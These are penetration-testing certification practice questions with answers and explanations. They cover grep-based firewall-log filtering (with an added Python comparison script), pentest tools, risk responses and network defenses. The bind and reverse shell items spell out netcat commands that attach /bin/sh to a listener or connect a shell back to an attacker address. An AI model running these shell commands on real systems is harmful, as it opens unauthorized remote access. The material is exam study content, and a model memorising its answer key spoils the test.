Explanation OBJ-4.4: The easiest way to do this is with grep. In Linux, you can chain commands together by piping one command's output into the next, so the first grep narrows the file to lines containing the address and the second narrows those to port 23, leaving a smaller, filtered list of events to analyze. Look carefully at what the patterns really say. None of the options escape the dots in the IP address, so each dot is a regular-expression wildcard that matches any single character; in practice that still works here because no other field is likely to fit the pattern. The comma after the address is what matters: it stops 10.1.0.10 from also matching 10.1.0.102 (the backslash in front of it is harmless, since a comma is not a regular-expression metacharacter). The $ after the port number anchors 23 to the end of the line, which is where the destination port (DPT) sits, so a source port (SPT) of 23 earlier in the line does not match. Two caveats a careful analyst would address: "23$" also matches destination ports that merely end in 23, such as 123 or 8023, so ",23$" is tighter, and the address pattern matches 10.1.0.10 in the SRC column just as readily as in DST.
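To make the caveats concrete, the following is an added example written for this page (not part of the exam material): it applies the exam answer's two patterns to a constructed six-line firewall.log excerpt in the question's format, compares the result with a filter that parses the CSV columns and checks DST and DPT by position, and shows the tighter grep patterns (STRICT_IP, STRICT_PORT) that agree with the column-aware filter. SAMPLE_LOG and all function names are this example's own.

```python
import re

# Column layout from the question, and a constructed firewall.log excerpt in that layout
# (six made-up lines; the real file has 53,682).
HEADER = "DATE,FACILITY,CHAIN,IN,SRC,DST,LEN,TOS,PREC,TTL,ID,PROTO,SPT,DPT"
SAMPLE_LOG = """\
Jan 11 05:33:59,lx1 kernel: iptables,INPUT,eth0,10.1.0.102,10.1.0.1,52,0x00,0x00,128,2242,TCP,2564,23
Jan 11 05:34:02,lx1 kernel: iptables,INPUT,eth0,10.1.0.55,10.1.0.10,52,0x00,0x00,128,2243,TCP,41022,23
Jan 11 05:34:05,lx1 kernel: iptables,INPUT,eth0,10.1.0.55,10.1.0.102,52,0x00,0x00,128,2244,TCP,41023,23
Jan 11 05:34:07,lx1 kernel: iptables,OUTPUT,eth0,10.1.0.10,10.1.0.55,52,0x00,0x00,64,2245,TCP,40001,23
Jan 11 05:34:09,lx1 kernel: iptables,INPUT,eth0,10.1.0.55,10.1.0.10,52,0x00,0x00,128,2246,TCP,41024,123
Jan 11 05:34:11,lx1 kernel: iptables,INPUT,eth0,10.1.0.55,10.1.0.10,52,0x00,0x00,128,2247,TCP,41025,443
"""

# The exam answer:  grep "10.1.0.10\," firewall.log | grep "23$"
# The unescaped dots match any character and "\," is just a comma, so these are the
# patterns grep really applies.
LOOSE_IP, LOOSE_PORT = r"10.1.0.10,", r"23$"

# Tighter equivalents: pin the address to the DST column (the sixth field, so exactly five
# comma-terminated fields precede it), escape the dots, and require the comma before 23.
# As a shell pipeline:  grep -E '^([^,]*,){5}10\.1\.0\.10,' firewall.log | grep ',23$'
STRICT_IP, STRICT_PORT = r"^([^,]*,){5}10\.1\.0\.10,", r",23$"


def grep_pipeline(lines, ip_pattern=LOOSE_IP, port_pattern=LOOSE_PORT):
    """Mimic `grep PATTERN1 | grep PATTERN2`: keep lines matching both, in file order."""
    return [l for l in lines if re.search(ip_pattern, l) and re.search(port_pattern, l)]


def filter_by_columns(lines, dst="10.1.0.10", dpt="23"):
    """What the question actually asks for, done by parsing the CSV columns instead of
    pattern-matching the whole line. Lines with the wrong field count are skipped."""
    columns = HEADER.split(",")
    hits = []
    for line in lines:
        fields = line.split(",")
        if len(fields) != len(columns):
            continue
        rec = dict(zip(columns, fields))
        if rec["DST"] == dst and rec["DPT"] == dpt:
            hits.append(line)
    return hits


def compare(lines):
    """Show which lines the loose pipeline picks up that a column-aware filter rejects."""
    wanted = set(filter_by_columns(lines))
    loose = grep_pipeline(lines)
    return {"true_positives": [l for l in loose if l in wanted],
            "false_positives": [l for l in loose if l not in wanted]}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    result = compare(lines)
    print(f"loose pipeline matched {len(grep_pipeline(lines))} lines; "
          f"{len(result['false_positives'])} were false positives:")
    for line in result["false_positives"]:
        print("  ", line)
    print("strict grep agrees with the column filter:",
          grep_pipeline(lines, STRICT_IP, STRICT_PORT) == filter_by_columns(lines))
```

On the sample, the exam's pipeline returns three lines: the one genuine hit, an OUTPUT record whose source (not destination) is 10.1.0.10, and a record to destination port 123. The strict patterns and the column filter both return only the genuine hit.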

72
Q

Which of the following commands should be run on an attacker’s system to create a bind shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e /bin/sh

C.nc -lp -e /bin/sh

D.nc 192.168.1.53 31337

A

D.nc 192.168.1.53 31337

Explanation OBJ-4.3: A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you would execute "nc -lp 31337 -e /bin/sh" on the victim machine; this sets up a listener on port 31337 that executes /bin/sh for whoever connects. The attacker would then enter "nc 192.168.1.53 31337" on the attacking system to connect to the victim's bind shell, which is why that is the correct answer here. A reverse shell is the opposite arrangement: the target machine connects out to an attack machine that is listening on a specific port. To set up that listener on the attack machine, you would use "nc -lp 31337" on it, and to connect back from the victim machine you would enter "nc 192.168.1.53 31337 -e /bin/sh" on the victim.

73
Q

Which of the following tools provides a penetration tester with a framework to conduct technical social engineering attacks like phishing against an organization’s employees?

A.Kismet

B.SET

C.Proxychains

D.Censys

A

B.SET

Explanation OBJ-4.2: SET (Social Engineer Toolkit) is an open-source penetration testing framework included with Kali Linux that supports the use of social engineering to penetrate a network or system. Kismet is an 802.11 Layer 2 wireless network detector, sniffer, and intrusion detection system included with Kali Linux. Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Censys is a search engine that returns information about the types of devices connected to the Internet.

74
Q

Which of the following commands should be run on a victim’s system to create a bind shell?

A.nc -lp 31337

B.nc 192.168.1.53 31337 -e/bin/sh

C.nc -lp 31337 -e/bin/sh

D.nc 192.168.1.53 31337

A

C.nc -lp 31337 -e/bin/sh

Explanation OBJ-4.3: A bind shell is established when a victim system "binds" its shell to a local network port. To achieve this using netcat, you would execute "nc -lp 31337 -e /bin/sh" on the victim machine; this sets up a listener on port 31337 that executes /bin/sh for whoever connects. The attacker would then enter "nc 192.168.1.53 31337" to connect to the victim's bind shell. A reverse shell is the opposite arrangement: the target machine connects out to an attack machine that is listening on a specific port. To set up that listener on the attack machine, you would use "nc -lp 31337" on it, and to connect back from the victim machine you would enter "nc 192.168.1.53 31337 -e /bin/sh" on the victim. The practical difference is firewall direction: a bind shell needs an inbound connection to the victim to be allowed, while a reverse shell only needs the victim to be able to connect out. Note also that -e exists in netcat-traditional and in Nmap's ncat but not in the OpenBSD netcat shipped by many distributions.

75
Q

Which of the following tools provides a penetration tester with the ability to mask their identity and source IP address by sending messages through intermediaries?

A.Powersploit

B.Responder

C.Empire

D.ProxyChains

A

D.ProxyChains

Explanation: OBJ-4.2: Proxychains is a command-line tool that enables pen testers to mask their identity and/or source IP address by sending messages through intermediary or proxy servers. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to possibly recover sensitive information such as user names and passwords.

76
Q

A new piece of malware attempts to exfiltrate user data by hiding the traffic and sending it over a TLS-encrypted outbound traffic over random ports.

What technology would be able to detect and block this type of traffic?

A.Intrusion detection system

B.Application-aware firewall

C.Stateful packet inspection

D.Stateless packet inspection

A

B.Application-aware firewall

Explanation OBJ-5.3: Only an application-aware (next-generation) firewall can both detect and block this traffic. It identifies the application or protocol from the traffic itself rather than from the port number, so TLS sessions running to random ports are recognized for what they are and can be dropped by policy, and because it sits inline it is able to block them. Stateless packet inspection looks only at header fields such as the port number, and stateful inspection adds connection tracking but still no application identification, so neither recognizes the exfiltration. An intrusion detection system may detect the activity, but an IDS only alerts; it is not placed inline to block. Keep in mind that TLS hides the payload from all of these devices: without TLS interception, the firewall acts on protocol fingerprinting and connection metadata, not on the data being exfiltrated.

77
Q

Dion Training is concerned with the possibility of a data breach causing a financial loss to the company.

After performing a risk analysis, the COO decides to purchase data breach insurance to protect the company in an incident.

Which of the following best describes the company’s risk response?

A.Avoidance

B.Transference

C.Acceptance

D.Mitigation

A

B.Transference

Explanation OBJ-5.1: Transference (or sharing) means assigning risk to a third party (such as an insurance company or a contract with a supplier that defines liabilities). Avoidance means that the company stops doing the activity that is risk-bearing. Risk mitigation is the overall process of reducing exposure to or the effects of risk factors, such as patching a vulnerable system. Acceptance means that no countermeasures are put in place either because the risk level does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.

78
Q

A network technician is tasked with designing a firewall to improve security for an existing FTP server on the company network and is accessible from the Internet.

The security personnel are concerned that the FTP server is compromised and is possibly being used to attack other company servers.

What is the BEST way to mitigate this risk?

A.Add an outbound ACL to the firewall

B.Change the FTP server to a more secure SFTP

C.Use implicit deny of the firewall

D.Move the server to the company’s DMZ

A

D.Move the server to the company’s DMZ

Explanation OBJ-5.3: The DMZ is the subnetwork that hosts public-facing servers, separated from the internal network by the firewall and with additional security mitigations in place. Placing the FTP server there means that even if it is compromised, the firewall still stands between it and the internal servers, so it cannot be used as a springboard to attack them.

79
Q

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it.

The IT team is concerned about the appliance receiving the necessary updates.

Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

A.Configuration management

B.Vulnerability scanning

C.Scan and patch the device

D.Automatic updates

A

B.Vulnerability scanning

Explanation OBJ-5.3: The best option here is vulnerability scanning, because it lets the IT team learn what risk the appliance adds to the network and where compensating mitigations may be possible. Configuration management, automatic updates, and scanning-and-patching would all be reasonable responses, but none of them is viable without administrative access to the appliance, which the vendor holds. The team should therefore keep scanning the device to understand the risk it carries, raise any findings with the vendor under the managed-service agreement, and add compensating controls outside the appliance, such as firewall rules, a WAF, or network segmentation, to limit the exposure of the vulnerabilities it presents.

80
Q

You are working as part of a 5-person penetration testing team conducting a compliance-based assessment of Dion Training’s e-commerce server.

During your team’s daily standup, you heard that 4 of the team members were planning on conducting vulnerability scans at the same time as you were scheduled to perform a stress test.

You are worried that this may overload the server and may negatively impact the client’s production servers.

You have recommended that you reschedule your stress test to occur after the vulnerability scans are completed to prevent overloading the production server.

Which of the following BEST describes what you did?

A.Situational awareness

B.De-escalation

C.Goal reprioritization

D.De-confliction

A

B.De-escalation

Explanation OBJ-5.4: Communication among penetration testing team members is crucial to ensuring that the engagement succeeds and does not negatively impact the client. In this scenario too many testers were focused on the same system at the same time, which can overload the server and cause a denial of service on the client's production network. By moving the stress test to after the vulnerability scans, you have de-escalated the impact of running them simultaneously. This is not goal reprioritization, since the engagement's overall goals were not changed and all of them would still be achieved during the engagement.

81
Q

Dion Training is worried about the security of the data on their corporate smartphones if lost or stolen. The Chief Security Officer has instructed that the devices be configured so that unauthorized users cannot access the data. Which TWO of the following settings would provide the BEST security and protection for the corporate smartphones’ data?

A.Require complex passwords

B.Configure the ability to perform a remote wipe

C.Enable a pattern lock

D.Enable device lockout after 3 failed attempts

E.Enable full device encryption

F.Disable the installation of the application

A

B.Configure the ability to perform a remote wipe

E.Enable full device encryption

Explanation OBJ-5.3: The BEST protections for the data would involve enabling full disk encryption and configuring the ability to perform a remote wipe. Even if the device is lost or stolen, its data would be unreadable if it was using full disk encryption. Additionally, by configuring the ability to wipe the device’s storage remotely, the data would be erased before a thief can access it.

82
Q

Which of the following would trigger the penetration test to stop and contact the system owners during an engagement?

A.A production server is unresponsive after attempting exploitation

B.Discovery of two servers not documented in the architecture diagrams

C.Discovery of encrypted PII personal data being stored on the system

D.A production server is unresponsive to ping requests

A

A.A production server is unresponsive after attempting exploitation

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance.

83
Q

You are configuring a network to utilize SNMPv3 to send information from your network devices back to an SNMP manager.

Which of the following SNMP options should you enable to ensure the data is transferred confidentially?

A.authPriv

B.authNoPriv

C.authProtect

D.authEncrypt

A

A.authPriv

Explanation OBJ-5.3: In SNMPv3, the authPriv option ensures that the communications are sent with authentication and privacy. This uses MD5 and SHA for authentication and DES and AES for privacy and encryption.

84
Q

Which of the following would trigger the penetration tester to stop and contact the system owners during an engagement?

A.Discovery of obfuscated PHI data being stored on the system

B.Discovery of an indicator of compromise on a production server

C.Discovery of missing Windows security patches on a production s server

D.Discovery of default credentials on an application in a staging network

A

B.Discovery of an indicator of compromise on a production server

Explanation OBJ-5.4: The penetration testing team should have a direct communication path with the system owners or their trusted agents during an engagement. If the team discovers any security breaches, current hacking activity, extremely critical findings on a production server, or a production server becomes unresponsive during exploitation, then the team should stop what they are doing and contact their trusted point of contact within the organization to get further guidance. An indicator of compromise on a production server is evidence of a possible prior breach and is one of the communication triggers that should stop testing.

85
Q

You conducted a security scan and found that port 389 is being used when connecting to LDAP for user authentication instead of port 636.

The security scanning software recommends that you remediate this by changing user authentication to port to 636 wherever possible.

What should you do?

A.Conduct remediation actions to update encryption keys on each server to match port 636

B.Mark this as a false positive in your audit report since the service that typically run on ports 389 and 636 are identical

C.Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

D.Change all devices and servers that support it to port 636 since port 389 is a reserved port that requires root access and can expose the server to privilege escalation attacks

A

C.Change all devices and servers that support it to port 636 since encrypted services run by default on port 636

Explanation OBJ-5.3: LDAP can run on either port 389 or port 636. Port 389 is the standard LDAP port, and traffic on it is unencrypted unless the client and server negotiate STARTTLS on the connection. Port 636 is LDAPS, where the session is wrapped in TLS from the start. Since the scanner found plain LDAP in use, you should change all devices and servers that can technically support the change to port 636, so that the authentication traffic is encrypted by default, and confirm afterwards with a rescan that port 389 is no longer carrying cleartext credentials.

86
Q
A